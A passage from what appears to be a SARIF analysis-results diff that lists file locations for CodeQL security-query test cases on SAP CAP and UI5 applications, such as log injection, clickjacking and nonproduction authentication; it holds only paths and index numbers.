"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 48 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 67 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 77 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 87 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 